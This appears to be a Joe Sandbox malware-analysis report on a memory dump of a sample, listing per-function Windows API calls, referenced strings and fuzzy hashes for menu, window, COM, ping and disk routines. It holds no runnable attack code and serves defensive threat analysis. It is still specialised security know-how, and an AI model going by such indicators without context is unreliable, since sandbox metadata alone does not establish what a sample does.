                                    • Instruction ID: 1d7b2d95b9b7ea8e14f1e1b6b75b056132589bf71112be61e1d6ab69ed8ff79d
                                    • Opcode Fuzzy Hash: c3a97d0c74d25adbf9b32b3d0aa35863134563974d34c020795b16b1d51a2563
                                    • Instruction Fuzzy Hash: 05419F31008144EFDB21AF28DC98BB97B66FB06331F144265FE65CA2E2C7718D42EB61
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,0090F910), ref: 008EA90B
                                    • GetDriveTypeW.KERNEL32(00000061,009389A0,00000061), ref: 008EA9D5
                                    • _wcscpy.LIBCMT ref: 008EA9FF
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharDriveLowerType_wcscpy
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2820617543-1000479233
                                    • Opcode ID: 64094e400880f9f17a0885554c755d9d4cdc80ae4784b1bee65085a2bed263ed
                                    • Instruction ID: aebfb1f0e651c882fdc49741dbb6ba8ce9fb65afce4016880d673bb07762f0a9
                                    • Opcode Fuzzy Hash: 64094e400880f9f17a0885554c755d9d4cdc80ae4784b1bee65085a2bed263ed
                                    • Instruction Fuzzy Hash: 15517C311183519FC314EF19C892AAFBBA5FF86704F154829F4A6D72A2DB31A909CB53
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __i64tow__itow__swprintf
                                    • String ID: %.15g$0x%p$False$True
                                    • API String ID: 421087845-2263619337
                                    • Opcode ID: c9958344da4f9e530ba4403aca38a20c425f3f4267ab50325c396aa68878f785
                                    • Instruction ID: e7874aafe9297661df683d2a0e84c9d1981163acf67b25b0a8f5c1e2100e0d28
                                    • Opcode Fuzzy Hash: c9958344da4f9e530ba4403aca38a20c425f3f4267ab50325c396aa68878f785
                                    • Instruction Fuzzy Hash: FB41D771500609AFEB34EF78DC46EB677E8FF46304F24447EE589D7292EA31A9418B11
                                    APIs
                                    • _memset.LIBCMT ref: 0090716A
                                    • CreateMenu.USER32 ref: 00907185
                                    • SetMenu.USER32(?,00000000), ref: 00907194
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00907221
                                    • IsMenu.USER32(?), ref: 00907237
                                    • CreatePopupMenu.USER32 ref: 00907241
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0090726E
                                    • DrawMenuBar.USER32 ref: 00907276
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                    • String ID: 0$F
                                    • API String ID: 176399719-3044882817
                                    • Opcode ID: f4f0e2a64ea53c1db32448b5f0c139f06698e7d6e6edfa004ac9fc5ab05afc1e
                                    • Instruction ID: b38650001109e2a85aa62be1917b54977854e0eaf38468b42516d86b14389d3f
                                    • Opcode Fuzzy Hash: f4f0e2a64ea53c1db32448b5f0c139f06698e7d6e6edfa004ac9fc5ab05afc1e
                                    • Instruction Fuzzy Hash: B1416C75A15209EFDB20DFA8D844EAABBF9FF49320F140029F955973A1D731A910DF90
                                    APIs
                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0090755E
                                    • CreateCompatibleDC.GDI32(00000000), ref: 00907565
                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00907578
                                    • SelectObject.GDI32(00000000,00000000), ref: 00907580
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0090758B
                                    • DeleteDC.GDI32(00000000), ref: 00907594
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0090759E
                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009075B2
                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009075BE
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                    • String ID: static
                                    • API String ID: 2559357485-2160076837
                                    • Opcode ID: 01a08c989179b61491e7325101d143529f81669610710c19fc6d310be5db34ef
                                    • Instruction ID: 9f4c3fc1dd0c89a95a781ce69817b404ea9e965a0259081a0a7dedd820c4447f
                                    • Opcode Fuzzy Hash: 01a08c989179b61491e7325101d143529f81669610710c19fc6d310be5db34ef
                                    • Instruction Fuzzy Hash: F6316A72518219AFDF219FA4DC09FEA7B6DFF09720F114224FA15A60E0C735E911EBA4
                                    APIs
                                    • _memset.LIBCMT ref: 008A6E3E
                                      • Part of subcall function 008A8B28: __getptd_noexit.LIBCMT ref: 008A8B28
                                    • __gmtime64_s.LIBCMT ref: 008A6ED7
                                    • __gmtime64_s.LIBCMT ref: 008A6F0D
                                    • __gmtime64_s.LIBCMT ref: 008A6F2A
                                    • __allrem.LIBCMT ref: 008A6F80
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A6F9C
                                    • __allrem.LIBCMT ref: 008A6FB3
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A6FD1
                                    • __allrem.LIBCMT ref: 008A6FE8
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A7006
                                    • __invoke_watson.LIBCMT ref: 008A7077
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                    • String ID:
                                    • API String ID: 384356119-0
                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                    • Instruction ID: 6c1ecb5556fc9f7088ae5bee78f15442f18378e8ea2e24b94b07cc76c78310b7
                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                    • Instruction Fuzzy Hash: 4771E776A00B16ABF714AE7CDC42B9AB7A4FF06724F244229F514D7A81F770D9208BD1
                                    APIs
                                    • _memset.LIBCMT ref: 008E2542
                                    • GetMenuItemInfoW.USER32(00945890,000000FF,00000000,00000030), ref: 008E25A3
                                    • SetMenuItemInfoW.USER32(00945890,00000004,00000000,00000030), ref: 008E25D9
                                    • Sleep.KERNEL32(000001F4), ref: 008E25EB
                                    • GetMenuItemCount.USER32(?), ref: 008E262F
                                    • GetMenuItemID.USER32(?,00000000), ref: 008E264B
                                    • GetMenuItemID.USER32(?,-00000001), ref: 008E2675
                                    • GetMenuItemID.USER32(?,?), ref: 008E26BA
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008E2700
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2714
                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2735
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                    • String ID:
                                    • API String ID: 4176008265-0
                                    • Opcode ID: 6d9fc1aeaf0f124ea4041fc10b6a0340576838983cf811158ef1af87159ce6d7
                                    • Instruction ID: 4217a2b5277b1e1a3eac63677fd659337dfea2ee6fe15a1e44c25a7774c21583
                                    • Opcode Fuzzy Hash: 6d9fc1aeaf0f124ea4041fc10b6a0340576838983cf811158ef1af87159ce6d7
                                    • Instruction Fuzzy Hash: 45619F70914289AFDB21CFA5CC94DBE7BBCFB02304F140169E842E7261D771AE05DB21
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00906FA5
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00906FA8
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00906FCC
                                    • _memset.LIBCMT ref: 00906FDD
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00906FEF
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00907067
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow_memset
                                    • String ID:
                                    • API String ID: 830647256-0
                                    • Opcode ID: 0d45ef372960736dbbe6970f7c5db4f8a919d60d863f0fabaa2decd192309bf9
                                    • Instruction ID: 842a4fe2d0c5ef0bf8ca471fd4dd480350d9c9abf8dae882e8361a4aa3511717
                                    • Opcode Fuzzy Hash: 0d45ef372960736dbbe6970f7c5db4f8a919d60d863f0fabaa2decd192309bf9
                                    • Instruction Fuzzy Hash: 35614975904208AFDB11DFA8CC81EEEB7B8EF09710F104159FA14EB2E2C775A951DBA0
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008D6BBF
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 008D6C18
                                    • VariantInit.OLEAUT32(?), ref: 008D6C2A
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 008D6C4A
                                    • VariantCopy.OLEAUT32(?,?), ref: 008D6C9D
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 008D6CB1
                                    • VariantClear.OLEAUT32(?), ref: 008D6CC6
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 008D6CD3
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D6CDC
                                    • VariantClear.OLEAUT32(?), ref: 008D6CEE
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D6CF9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: 5de218236320982e62f01a088dc3aac0d37fd531c46f4a16d544ecb05350f612
                                    • Instruction ID: ae3beae9800358915fd01478fcf6fe68c6b5235cbf945517786ff963c36e2565
                                    • Opcode Fuzzy Hash: 5de218236320982e62f01a088dc3aac0d37fd531c46f4a16d544ecb05350f612
                                    • Instruction Fuzzy Hash: 33418231A1021D9FCF10DF68D8989AEBBB9FF08314F00816AE955E7361DB30AA45DF90
                                    APIs
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • CoInitialize.OLE32 ref: 008F8403
                                    • CoUninitialize.COMBASE ref: 008F840E
                                    • CoCreateInstance.COMBASE(?,00000000,00000017,00912BEC,?), ref: 008F846E
                                    • IIDFromString.COMBASE(?,?), ref: 008F84E1
                                    • VariantInit.OLEAUT32(?), ref: 008F857B
                                    • VariantClear.OLEAUT32(?), ref: 008F85DC
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 834269672-1287834457
                                    • Opcode ID: 51d2075c1ee1a105833cc73da4876bb6ed4dd723b03c126589ce64c795822b5b
                                    • Instruction ID: be29f696820a07b2ba42db8be2096d186c6ad8a3ea67362501f45975f07dc5f4
                                    • Opcode Fuzzy Hash: 51d2075c1ee1a105833cc73da4876bb6ed4dd723b03c126589ce64c795822b5b
                                    • Instruction Fuzzy Hash: 19618B7060871ADFC710DF24C848A6AB7E8FF49758F044519FA86DB291CB70EE44CB92
                                    APIs
                                    • WSAStartup.WS2_32(00000101,?), ref: 008F5793
                                    • inet_addr.WS2_32(?), ref: 008F57D8
                                    • gethostbyname.WS2_32(?), ref: 008F57E4
                                    • IcmpCreateFile.IPHLPAPI ref: 008F57F2
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5862
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5878
                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008F58ED
                                    • WSACleanup.WS2_32 ref: 008F58F3
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: 662d3a9e0b33a31c38dd7fbb4b2c45eb5d76e2e6eb05f7ef686450b655246109
                                    • Instruction ID: 6c3b2942bb506647fd56f0e722d62f419c7a268c6c5d1bb935ca58d668046056
                                    • Opcode Fuzzy Hash: 662d3a9e0b33a31c38dd7fbb4b2c45eb5d76e2e6eb05f7ef686450b655246109
                                    • Instruction Fuzzy Hash: 51518C31614604EFD720AF28DC45B3ABBE4FB48760F044529FA96DB2A1DB30E900DB42
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 008EB4D0
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008EB546
                                    • GetLastError.KERNEL32 ref: 008EB550
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 008EB5BD
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 1170203b5c0d86b8f76036566ec399a707194ec4b7561be067e1d8f55c8a7fbd
                                    • Instruction ID: 97fe9c6d1cf438ce9fad91af74cd70073c2f020e260e4308b7d0fa5c520e7dc8
                                    • Opcode Fuzzy Hash: 1170203b5c0d86b8f76036566ec399a707194ec4b7561be067e1d8f55c8a7fbd
                                    • Instruction Fuzzy Hash: 73318E35A00249EFCB10EB69D885ABFBBB4FF4A314F144126F515E7291DB709A42CB91
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008D9014
                                    • GetDlgCtrlID.USER32 ref: 008D901F
                                    • GetParent.USER32 ref: 008D903B
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D903E
                                    • GetDlgCtrlID.USER32(?), ref: 008D9047
                                    • GetParent.USER32(?), ref: 008D9063
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D9066
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: 1250f929fbc6cb04b719eb7d0b8048b3d201d2694184ea48e7f31b7fc871942a
                                    • Instruction ID: cda98fcb31732f5d05b53fdc8643dbd619d4666fe641fc92118e0726f9256694
                                    • Opcode Fuzzy Hash: 1250f929fbc6cb04b719eb7d0b8048b3d201d2694184ea48e7f31b7fc871942a
                                    • Instruction Fuzzy Hash: D621FF75A00108BFDF14ABA4CC95EFEBB74FF49310F10021AF961972A1DB368919EB21
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008D90FD
                                    • GetDlgCtrlID.USER32 ref: 008D9108
                                    • GetParent.USER32 ref: 008D9124
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D9127
                                    • GetDlgCtrlID.USER32(?), ref: 008D9130
                                    • GetParent.USER32(?), ref: 008D914C
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D914F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: a672b103fe712274477d12a503cb82024532898e7bdb269d64d2914a77ee8b0e
                                    • Instruction ID: 73e6018414c56c261f96d39b87af38fee6d9383d46f587d33314806817093306
                                    • Opcode Fuzzy Hash: a672b103fe712274477d12a503cb82024532898e7bdb269d64d2914a77ee8b0e
                                    • Instruction Fuzzy Hash: BE21B075A00108BBDF10ABA4CC85AFEBB74FB48300F100216F951972A1DA758919EB21
                                    APIs
                                    • GetParent.USER32 ref: 008D916F
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 008D9184
                                    • _wcscmp.LIBCMT ref: 008D9196
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008D9211
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend_wcscmp
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1704125052-3381328864
